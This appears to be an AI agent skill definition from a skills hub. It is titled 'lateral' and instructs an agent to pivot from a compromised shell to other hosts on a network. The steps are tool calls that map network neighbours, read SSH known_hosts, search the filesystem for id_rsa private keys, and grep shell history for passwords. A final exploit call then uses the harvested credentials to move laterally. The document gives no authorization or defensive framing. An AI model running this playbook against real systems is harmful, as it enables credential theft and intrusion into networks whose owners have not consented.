# lateral > Lateral movement and network pivoting. Use when user has a shell and wants to move to other systems on the network. - Author: Monopoly CW - Repository: veil-protocol/usf-7 - Version: 20260125012158 - Stars: 1 - Forks: 0 - Last Updated: 2026-02-06 - Source: https://github.com/veil-protocol/usf-7 - Web: https://mule.run/skillshub/@@veil-protocol/usf-7~lateral:20260125012158 --- --- name: lateral description: Lateral movement and network pivoting. Use when user has a shell and wants to move to other systems on the network. argument-hint: --- # Lateral Movement Pivot from session: $ARGUMENTS ## Execution 1. **Discover network neighbors** ``` mcp__omega-nexus__omega_post_exploit( session_id="$ARGUMENTS", commands=["ip neigh", "arp -a", "cat /etc/hosts", "cat ~/.ssh/known_hosts"] ) ``` 2. **Find credentials** ``` mcp__omega-nexus__omega_post_exploit( session_id="$ARGUMENTS", commands=["find / -name id_rsa 2>/dev/null", "cat ~/.bash_history | grep -i pass"] ) ``` 3. **Research techniques** ``` mcp__omega-nexus__omega_vault_query(query="lateral movement ssh smb", context="security") ``` 4. **Execute lateral movement** ``` mcp__omega-nexus__omega_exploit( target="", exploit_type="lateral", options={"source_session": "$ARGUMENTS", "credentials": ""} ) ``` ## Output Report new sessions obtained and lateral movement path.